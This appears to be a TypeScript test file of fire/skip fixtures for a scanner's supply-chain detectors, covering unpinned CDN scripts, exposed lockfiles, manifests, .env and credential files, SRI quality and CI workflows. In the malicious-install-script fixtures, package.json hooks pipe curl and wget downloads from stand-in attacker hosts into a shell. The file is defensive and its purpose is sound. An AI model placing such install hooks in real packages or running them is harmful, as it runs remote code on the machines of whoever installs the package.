/**
 * Per-detector tests for the supply-chain category.
 *
 * Covers lib/scanner/checks/supply-chain.ts. Every detector is exercised
 * by the smoke harness (callable, no-throw, deterministic); the fixtures
 * below add a fires/does-not-fire pair on top of that.
 *
 * For the per-ecosystem manifest detectors, the negative case is
 * deliberately the file each one is most likely to be confused with rather
 * than an unrelated page: poetry.lock against Cargo.lock (both are
 * [[package]] tables), Cargo.toml against pyproject.toml (both TOML
 * manifests with a dependency table). That pairing is what proves the
 * fingerprints actually discriminate instead of matching a shape several
 * ecosystems share.
 */

import { detectors } from "@/lib/scanner/checks/supply-chain";
import { runDetectorTests, type DetectorFixtures } from "./_test-harness";

const fixtures: DetectorFixtures = {
  "supply-chain-cdn-script-unpinned-version": [
    {
      description: "jsdelivr npm script with no version and no SRI",
      body: '<script src="https://cdn.jsdelivr.net/npm/lodash/lodash.min.js"></script>',
      expect: "fire",
      evidenceIncludes: "no pinned version",
    },
    {
      description: "unpkg script explicitly pinned to @latest",
      body: '<script src="https://unpkg.com/react@latest/umd/react.production.min.js"></script>',
      expect: "fire",
      evidenceIncludes: "no pinned version",
    },
    {
      description: "jsdelivr script pinned to an exact version, with SRI",
      body: '<script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js" integrity="sha384-abc123" crossorigin="anonymous"></script>',
      expect: "skip",
    },
    {
      description: "self-hosted script, not a CDN URL at all",
      body: '<script src="/static/js/app.js"></script>',
      expect: "skip",
    },
  ],

  "supply-chain-dockerfile-exposed": [
    {
      description:
        "docker-compose.yml pinned to a dotted Compose spec version (the near-universal modern format)",
      body: "version: '3.8'\nservices:\n  web:\n    image: myapp:latest\n",
      expect: "fire",
      evidenceIncludes: "docker-compose.yml",
    },
    {
      description: "docker-compose.yml pinned to a legacy bare-integer version",
      body: "version: '3'\nservices:\n  web:\n    image: myapp:latest\n",
      expect: "fire",
      evidenceIncludes: "docker-compose.yml",
    },
    {
      description: "Dockerfile with FROM and a build instruction",
      body: 'FROM node:18-alpine\nRUN npm install\nCMD ["node", "index.js"]\n',
      expect: "fire",
      evidenceIncludes: "Dockerfile",
    },
    {
      description:
        "blog prose mentioning docker-compose.yml without its content",
      body: "We use docker-compose.yml to define our services, similar to a Dockerfile.",
      expect: "skip",
    },
  ],

  "supply-chain-composer-auth-json-exposed": [
    {
      description: "http-basic block with a real, non-placeholder password",
      body: '{"http-basic":{"repo.example.com":{"username":"deployer","password":"s3cr3t-real-password-xyz123"}}}',
      expect: "fire",
      evidenceIncludes: "auth.json",
    },
    {
      description: "github-oauth block with a real-shaped token",
      body: '{"github-oauth":{"github.com":"ghp_9x8y7z6w5v4u3t2s1r0q9p8o7n6m5l4k3j2i1h"}}',
      expect: "fire",
    },
    {
      description: "http-basic block with an unfilled placeholder password",
      body: '{"http-basic":{"repo.example.com":{"username":"deployer","password":"your_password_here"}}}',
      expect: "skip",
    },
    {
      description:
        "ordinary composer.json (require/require-dev), no auth keys present",
      body: '{"require":{"php":">=8.0"},"require-dev":{"phpunit/phpunit":"^10"}}',
      expect: "skip",
    },
  ],

  "supply-chain-cargo-lock-exposed": [
    {
      description: "real Cargo.lock with [[package]] and crates.io source",
      body: '# This file is automatically @generated by Cargo.\nversion = 3\n\n[[package]]\nname = "serde"\nversion = "1.0.190"\nsource = "registry+https://github.com/rust-lang/crates.io-index"\n',
      expect: "fire",
      evidenceIncludes: "cargo.lock",
    },
    {
      description: "Cargo.toml (manifest, not the lock file)",
      body: '[package]\nname = "myapp"\nversion = "0.1.0"\n[dependencies]\nserde = "1.0"\n',
      expect: "skip",
    },
    {
      description: "blog prose mentioning Cargo.lock without its content",
      body: "Our project pins dependencies using Cargo.lock, similar to package-lock.json in npm.",
      expect: "skip",
    },
  ],

  "supply-chain-go-sum-exposed": [
    {
      description: "real go.sum with multiple module checksum lines",
      body: "github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=\ngithub.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=\n",
      expect: "fire",
      evidenceIncludes: "go.sum",
    },
    {
      description: "go.mod (module manifest, not the checksum file)",
      body: "module github.com/example/app\n\ngo 1.21\n\nrequire (\n\tgithub.com/pkg/errors v0.9.1\n)\n",
      expect: "skip",
    },
    {
      description: "single go.sum-shaped line, below the 2-line threshold",
      body: "github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=",
      expect: "skip",
    },
  ],

  "supply-chain-malicious-install-script": [
    {
      description: "postinstall pipes a curl download directly into bash",
      body: '{"name":"leftpad-utils","scripts":{"postinstall":"curl -sL https://evil.example.net/x.sh | bash"}}',
      expect: "fire",
      evidenceIncludes: "install hook",
    },
    {
      description: "preinstall pipes a wget download directly into sh",
      body: '{"name":"sneaky-pkg","scripts":{"preinstall":"wget -qO- http://attacker.test/setup.sh | sh"}}',
      expect: "fire",
    },
    {
      description: "ordinary postinstall running a local build script",
      body: '{"name":"good-pkg","scripts":{"postinstall":"node scripts/postinstall.js","prepare":"husky install"}}',
      expect: "skip",
    },
    {
      description:
        "documentation explaining the attack pattern, not a live package.json",
      body: 'This is a documentation example of a malicious pattern: "scripts": { "postinstall": "curl -sL https://evil.example.net/x.sh | bash" }',
      expect: "skip",
    },
  ],

  // ── Documentation/tutorial pages must not self-trigger ───────────────
  // Every detector here is wrapped in stripDocBlocks(), so config-file
  // content rendered as an example inside <pre>/<code> is removed before
  // the fingerprint patterns run. A genuinely exposed file is served raw
  // with no HTML tags at all, so the primary path is unaffected.

  "supply-chain-lockfile-exposed": [
    {
      description: "raw package-lock.json served over HTTP",
      body: '{"name":"app","lockfileVersion":3,"requires":true,"packages":{}}',
      expect: "fire",
      evidenceIncludes: "package-lock.json",
    },
    {
      description:
        "tutorial page showing lockfile content as an example inside <code>",
      url: "https://blog.example.com/posts/npm-lockfiles",
      body: '<html><body><p>A lockfile starts like this:</p><code>{"name":"app","lockfileVersion":3}</code></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-env-file-exposed": [
    {
      description: "raw .env file served over HTTP",
      body: "DATABASE_URL=postgres://user:pass@localhost/db\nAPI_KEY=abc123\nSECRET_TOKEN=xyz789\n",
      expect: "fire",
      evidenceIncludes: ".env",
    },
    {
      description:
        "docs page showing the same .env content as an example inside <pre>",
      url: "https://docs.example.com/setup",
      body: "<html><body><h2>Example .env</h2><pre>DATABASE_URL=postgres://user:pass@localhost/db\nAPI_KEY=abc123\nSECRET_TOKEN=xyz789\n</pre></body></html>",
      expect: "skip",
    },
  ],

  // ── Dependency manifests and lockfiles, one ecosystem per detector ────
  //
  // Each positive fixture is a real fragment of the file the detector is
  // named for. Each negative is either the file it is most likely to be
  // confused with (Cargo.lock vs poetry.lock, both [[package]] tables), or
  // a page that merely talks about it.

  "supply-chain-poetry-lock-exposed": [
    {
      description: "poetry.lock with its generation banner",
      body: '# This file is automatically @generated by Poetry 1.8.3 and should not be changed by hand.\n\n[[package]]\nname = "requests"\nversion = "2.31.0"\n\n[metadata]\nlock-version = "2.0"\n',
      expect: "fire",
      evidenceIncludes: "poetry.lock",
    },
    {
      description: "Cargo.lock, which uses the same [[package]] table",
      body: '# This file is automatically @generated by Cargo.\nversion = 3\n\n[[package]]\nname = "serde"\nversion = "1.0.197"\nsource = "registry+https://github.com/rust-lang/crates.io-index"\n',
      expect: "skip",
    },
  ],

  "supply-chain-pipfile-lock-exposed": [
    {
      description: "Pipfile.lock with its _meta block",
      body: '{"_meta":{"hash":{"sha256":"abc"},"pipfile-spec":6,"requires":{"python_version":"3.12"},"sources":[{"name":"pypi","url":"https://pypi.org/simple"}]},"default":{"flask":{"version":"==3.0.0"}}}',
      expect: "fire",
      evidenceIncludes: "pipfile.lock",
    },
    {
      description: "ordinary API JSON with no pipfile-spec",
      body: '{"_meta":{"page":1},"default":{"locale":"en"}}',
      expect: "skip",
    },
  ],

  "supply-chain-gradle-lockfile-exposed": [
    {
      description: "gradle.lockfile with its generated banner",
      body: "# This is a Gradle generated file for dependency locking.\n# Manual edits can break the build and are not advised.\ncom.google.guava:guava:33.0.0-jre=compileClasspath,runtimeClasspath\norg.slf4j:slf4j-api:2.0.12=compileClasspath\n",
      expect: "fire",
      evidenceIncludes: "gradle",
    },
    {
      description: "a page listing Maven coordinates as prose",
      body: "<html><body><p>Add com.google.guava:guava:33.0.0-jre to your build file.</p></body></html>",
      expect: "skip",
    },
  ],

  "supply-chain-maven-pom-exposed": [
    {
      description: "pom.xml with modelVersion and dependencies",
      body: '<?xml version="1.0"?><project xmlns="http://maven.apache.org/POM/4.0.0"><modelVersion>4.0.0</modelVersion><groupId>com.example</groupId><artifactId>app</artifactId><version>1.2.0</version><dependencies><dependency><groupId>org.springframework</groupId><artifactId>spring-web</artifactId><version>6.1.4</version></dependency></dependencies></project>',
      expect: "fire",
      evidenceIncludes: "pom.xml",
    },
    {
      description: "an XML sitemap",
      body: '<?xml version="1.0"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><url><loc>https://example.com/</loc></url></urlset>',
      expect: "skip",
    },
  ],

  "supply-chain-nuget-manifest-exposed": [
    {
      description: "packages.config with id and version attributes",
      body: '<?xml version="1.0" encoding="utf-8"?><packages><package id="Newtonsoft.Json" version="13.0.3" targetFramework="net48" /><package id="Serilog" version="3.1.1" targetFramework="net48" /></packages>',
      expect: "fire",
      evidenceIncludes: "packages.config",
    },
    {
      description: "packages.lock.json with resolved versions and hashes",
      body: '{"version":1,"dependencies":{"net8.0":{"Serilog":{"type":"Direct","requested":"[3.1.1, )","resolved":"3.1.1","contentHash":"9F6VBcQ=="}}}}',
      expect: "fire",
      evidenceIncludes: "packages.lock.json",
    },
    {
      description: "an unrelated XML document",
      body: "<?xml version=\"1.0\"?><catalog><item name='book'/></catalog>",
      expect: "skip",
    },
  ],

  "supply-chain-mix-lock-exposed": [
    {
      description: "mix.lock with Hex package tuples",
      body: '%{\n  "phoenix": {:hex, :phoenix, "1.7.11", "abc", [:mix], [], "hexpm", "def"},\n  "plug": {:hex, :plug, "1.15.2", "ghi", [:mix], [], "hexpm", "jkl"},\n}\n',
      expect: "fire",
      evidenceIncludes: "mix.lock",
    },
    {
      description: "a page mentioning :hex in prose",
      body: "<html><body><p>Elixir packages come from :hex, the community registry.</p></body></html>",
      expect: "skip",
    },
  ],

  "supply-chain-pubspec-lock-exposed": [
    {
      description: "pubspec.lock with direct dependency markers",
      body: 'packages:\n  http:\n    dependency: "direct main"\n    description:\n      name: http\n      url: "https://pub.dev"\n    source: hosted\n    version: "1.2.1"\n',
      expect: "fire",
      evidenceIncludes: "pubspec.lock",
    },
    {
      description: "a plain YAML config with a packages key",
      body: "packages:\n  - name: alpha\n  - name: beta\n",
      expect: "skip",
    },
  ],

  "supply-chain-swift-package-resolved-exposed": [
    {
      description: "Package.resolved with pinned revisions",
      body: '{"pins":[{"identity":"alamofire","kind":"remoteSourceControl","location":"https://github.com/Alamofire/Alamofire.git","state":{"revision":"3dc6a42c7727c49bf26508e29b0a0b35f9c7e1ad","version":"5.9.1"}}],"version":2}',
      expect: "fire",
      evidenceIncludes: "package.resolved",
    },
    {
      description: "unrelated JSON containing a pins key",
      body: '{"pins":[{"lat":51.5,"lon":-0.12}]}',
      expect: "skip",
    },
  ],

  "supply-chain-podfile-lock-exposed": [
    {
      description: "Podfile.lock with PODS and SPEC CHECKSUMS",
      body: "PODS:\n  - Alamofire (5.9.1)\n  - Firebase/Core (10.24.0)\n\nSPEC CHECKSUMS:\n  Alamofire: 0e8b8ba3\n\nCOCOAPODS: 1.15.2\n",
      expect: "fire",
      evidenceIncludes: "podfile.lock",
    },
    {
      description: "a page that mentions CocoaPods without the file",
      body: "<html><body><p>We install our iOS dependencies with CocoaPods.</p></body></html>",
      expect: "skip",
    },
  ],

  "supply-chain-terraform-lock-exposed": [
    {
      description: ".terraform.lock.hcl with pinned providers",
      body: 'provider "registry.terraform.io/hashicorp/aws" {\n  version     = "5.42.0"\n  constraints = "~> 5.0"\n  hashes = [\n    "h1:abcdef==",\n  ]\n}\n',
      expect: "fire",
      evidenceIncludes: "terraform",
    },
    {
      description: "a Terraform tutorial page quoting a provider block",
      body: '<html><body><pre>provider "registry.terraform.io/hashicorp/aws" {\n  version = "5.42.0"\n  hashes = [\n    "h1:abc==",\n  ]\n}</pre></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-cargo-toml-exposed": [
    {
      description: "Cargo.toml with a package table and dependencies",
      body: '[package]\nname = "example"\nversion = "0.3.1"\nedition = "2021"\n\n[dependencies]\nserde = { version = "1.0", features = ["derive"] }\n',
      expect: "fire",
      evidenceIncludes: "cargo.toml",
    },
    {
      description: "pyproject.toml, a different TOML manifest",
      body: '[project]\nname = "example"\nversion = "0.3.1"\nrequires-python = ">=3.10"\n\n[build-system]\nrequires = ["hatchling"]\n',
      expect: "skip",
    },
  ],

  "supply-chain-go-mod-exposed": [
    {
      description: "go.mod with a private module path",
      body: "module git.internal.example.com/platform/orders\n\ngo 1.22\n\nrequire (\n\tgithub.com/gin-gonic/gin v1.9.1\n)\n",
      expect: "fire",
      evidenceIncludes: "go.mod",
    },
    {
      description: "a page that talks about go modules",
      body: "<html><body><p>Run go mod tidy before committing.</p></body></html>",
      expect: "skip",
    },
  ],

  "supply-chain-setup-py-exposed": [
    {
      description: "setup.py with install_requires",
      body: 'from setuptools import setup\n\nsetup(\n    name="example",\n    version="1.4.0",\n    install_requires=[\n        "requests>=2.31",\n        "click>=8.1",\n    ],\n)\n',
      expect: "fire",
      evidenceIncludes: "setup.py",
    },
    {
      description: "a tutorial page showing setup() without install_requires",
      body: "<html><body><p>Call setup() from setuptools in your packaging script.</p></body></html>",
      expect: "skip",
    },
  ],

  "supply-chain-pyproject-toml-exposed": [
    {
      description: "pyproject.toml with a build-system table",
      body: '[build-system]\nrequires = ["hatchling"]\nbuild-backend = "hatchling.build"\n\n[project]\nname = "example"\nrequires-python = ">=3.10"\n',
      expect: "fire",
      evidenceIncludes: "pyproject.toml",
    },
    {
      description: "Cargo.toml, a different TOML manifest",
      body: '[package]\nname = "example"\nversion = "0.3.1"\nedition = "2021"\n\n[dependencies]\nserde = "1.0"\n',
      expect: "skip",
    },
  ],

  "supply-chain-git-dependency-unpinned": [
    {
      description: "package.json dependency on a git branch",
      body: '{"name":"app","version":"1.0.0","dependencies":{"internal-utils":"git+https://github.com/example/internal-utils.git#main","react":"18.3.1"}}',
      expect: "fire",
      evidenceIncludes: "internal-utils",
    },
    {
      description: "the same dependency pinned to a full commit SHA",
      body: '{"name":"app","version":"1.0.0","dependencies":{"internal-utils":"git+https://github.com/example/internal-utils.git#3f2b9c1d5a4e8f70b1c2d3e4f5a6b7c8d9e0f1a2","react":"18.3.1"}}',
      expect: "skip",
    },
    {
      description: "registry dependencies only",
      body: '{"name":"app","version":"1.0.0","dependencies":{"react":"18.3.1","zod":"^3.23.8"}}',
      expect: "skip",
    },
  ],

  // ── Module loading from CDNs ─────────────────────────────────────────

  "supply-chain-importmap-unpinned-cdn": [
    {
      description: "import map entry with no version in the CDN path",
      body: '<html><head><script type="importmap">{"imports":{"lit":"https://cdn.jsdelivr.net/npm/lit/index.js"}}</script></head><body></body></html>',
      expect: "fire",
      evidenceIncludes: "unversioned",
    },
    {
      description: "import map pinned to an exact version",
      body: '<html><head><script type="importmap">{"imports":{"lit":"https://cdn.jsdelivr.net/npm/lit@3.1.4/index.js"}}</script></head><body></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-importmap-insecure-source": [
    {
      description: "import map resolving a module over plain http",
      url: "https://example.com/",
      body: '<html><head><script type="importmap">{"imports":{"app/":"http://assets.example.net/modules/"}}</script></head><body></body></html>',
      expect: "fire",
      evidenceIncludes: "cleartext",
    },
    {
      description: "import map using https and relative paths",
      url: "https://example.com/",
      body: '<html><head><script type="importmap">{"imports":{"app/":"/modules/","lit":"https://cdn.jsdelivr.net/npm/lit@3.1.4/index.js"}}</script></head><body></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-esm-cdn-unpinned-import": [
    {
      description: "module import from esm.sh with no version",
      body: '<html><body><script type="module">import confetti from "https://esm.sh/canvas-confetti";</script></body></html>',
      expect: "fire",
      evidenceIncludes: "unversioned",
    },
    {
      description: "the same import pinned to a version",
      body: '<html><body><script type="module">import confetti from "https://esm.sh/canvas-confetti@1.9.3";</script></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-jsdelivr-gh-branch-reference": [
    {
      description: "jsDelivr /gh/ URL pinned to @main",
      body: '<html><body><script src="https://cdn.jsdelivr.net/gh/owner/repo@main/dist/widget.min.js"></script></body></html>',
      expect: "fire",
      evidenceIncludes: "moving reference",
    },
    {
      description: "jsDelivr /gh/ URL with no reference at all",
      body: '<html><body><script src="https://cdn.jsdelivr.net/gh/owner/repo/dist/widget.min.js"></script></body></html>',
      expect: "fire",
      evidenceIncludes: "moving reference",
    },
    {
      description: "jsDelivr /gh/ URL pinned to a release tag",
      body: '<html><body><script src="https://cdn.jsdelivr.net/gh/owner/repo@v1.4.2/dist/widget.min.js"></script></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-rawgit-cdn-reference": [
    {
      description: "script still pointing at cdn.rawgit.com",
      body: '<html><body><script src="https://cdn.rawgit.com/owner/repo/master/dist/widget.js"></script></body></html>',
      expect: "fire",
      evidenceIncludes: "rawgit",
    },
    {
      description: "page with only modern CDN references",
      body: '<html><body><script src="https://cdn.jsdelivr.net/npm/lit@3.1.4/index.js"></script></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-github-raw-script-source": [
    {
      description: "script src on raw.githubusercontent.com",
      body: '<html><body><script src="https://raw.githubusercontent.com/owner/repo/main/dist/widget.js"></script></body></html>',
      expect: "fire",
      evidenceIncludes: "githubusercontent",
    },
    {
      description: "a link (not a script) to a raw file",
      body: '<html><body><a href="https://raw.githubusercontent.com/owner/repo/main/README.md">raw readme</a></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-node-modules-path-served": [
    {
      description: "script loaded straight out of node_modules",
      body: '<html><body><script src="/node_modules/chart.js/dist/chart.umd.js"></script></body></html>',
      expect: "fire",
      evidenceIncludes: "node_modules",
    },
    {
      description: "the same library served from a build output directory",
      body: '<html><body><script src="/vendor/chart.umd.js"></script></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-bower-components-reference": [
    {
      description: "stylesheet loaded from bower_components",
      body: '<html><head><link rel="stylesheet" href="/bower_components/bootstrap/dist/css/bootstrap.min.css"></head><body></body></html>',
      expect: "fire",
      evidenceIncludes: "bower_components",
    },
    {
      description: "a blog post about migrating off Bower",
      body: "<html><body><p>We deleted bower_components last year and moved to npm.</p></body></html>",
      expect: "skip",
    },
  ],

  // ── Subresource Integrity quality ────────────────────────────────────

  "supply-chain-sri-weak-hash-algorithm": [
    {
      description: "integrity attribute using an sha1- prefix",
      body: '<html><body><script src="https://cdn.example.net/lib.js" integrity="sha1-7Qdjo1trhrCitmVKY6VBB0AJ4tY=" crossorigin="anonymous"></script></body></html>',
      expect: "fire",
      evidenceIncludes: "sha1",
    },
    {
      description: "integrity attribute using sha384",
      body: '<html><body><script src="https://cdn.example.net/lib.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6RzhGQ8K1uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" crossorigin="anonymous"></script></body></html>',
      expect: "skip",
    },
    {
      description: "sha256 alongside a legacy prefix (a recognised one wins)",
      body: '<html><body><script src="https://cdn.example.net/lib.js" integrity="sha1-7Qdjo1 sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" crossorigin="anonymous"></script></body></html>',
      expect: "skip",
    },
  ],

  "supply-chain-sri-missing-crossorigin": [
    {
      description: "cross-origin script with integrity but no crossorigin",
      url: "https://example.com/",
      body: '<html><body><script src="https://cdn.jsdelivr.net/npm/htmx.org@2.0.3/dist/htmx.min.js" integrity="sha384-abc123"></script></body></html>',
      expect: "fire",
      evidenceIncludes: "crossorigin",
    },
    {
      description: "same script with both attributes",
      url: "https://example.com/",
      body: '<html><body><script src="https://cdn.jsdelivr.net/npm/htmx.org@2.0.3/dist/htmx.min.js" integrity="sha384-abc123" crossorigin="anonymous"></script></body></html>',
      expect: "skip",
    },
    {
      description:
        "same-origin script with integrity, where crossorigin is not needed",
      url: "https://example.com/",
      body: '<html><body><script src="https://example.com/assets/app.js" integrity="sha384-abc123"></script></body></html>',
      expect: "skip",
    },
  ],

  // ── Build and release artifacts ──────────────────────────────────────

  "supply-chain-ci-workflow-exposed": [
    {
      description: "GitHub Actions workflow served over HTTP",
      body: "name: deploy\non:\n  push:\n    branches: [main]\njobs:\n  build:\n    runs-on: self-hosted-prod\n    steps:\n      - uses: actions/checkout@v4\n      - run: npm ci && npm run build\n",
      expect: "fire",
      evidenceIncludes: "workflow",
    },
    {
      description: "an unrelated YAML config with no jobs block",
      body: "name: app\nversion: 1.0.0\nservices:\n  web:\n    image: nginx\n",
      expect: "skip",
    },
  ],

  "supply-chain-github-action-unpinned-tag": [
    {
      description: "third-party action referenced by a version tag",
      body: "name: deploy\non:\n  push:\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n      - uses: docker/build-push-action@v6\n",
      expect: "fire",
      evidenceIncludes: "docker/build-push-action",
    },
    {
      description: "third-party action pinned to a full commit SHA",
      body: "name: deploy\non:\n  push:\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n      - uses: docker/build-push-action@4f58ea79222b3b9dc2c8bbdd6debcef730109a75\n",
      expect: "skip",
    },
  ],

  "supply-chain-sbom-document-exposed": [
    {
      description: "CycloneDX SBOM served over HTTP",
      body: '{"bomFormat":"CycloneDX","specVersion":"1.5","version":1,"components":[{"type":"library","name":"lodash","version":"4.17.21"}]}',
      expect: "fire",
      evidenceIncludes: "cyclonedx",
    },
    {
      description: "SPDX tag-value SBOM",
      body: "SPDXVersion: SPDX-2.3\nDataLicense: CC0-1.0\nSPDXID: SPDXRef-DOCUMENT\nDocumentName: example-app\n",
      expect: "fire",
      evidenceIncludes: "spdx",
    },
    {
      description: "a page that explains what an SBOM is",
      body: "<html><body><p>A software bill of materials lists every component in a build.</p></body></html>",
      expect: "skip",
    },
  ],
};

runDetectorTests(detectors, fixtures);
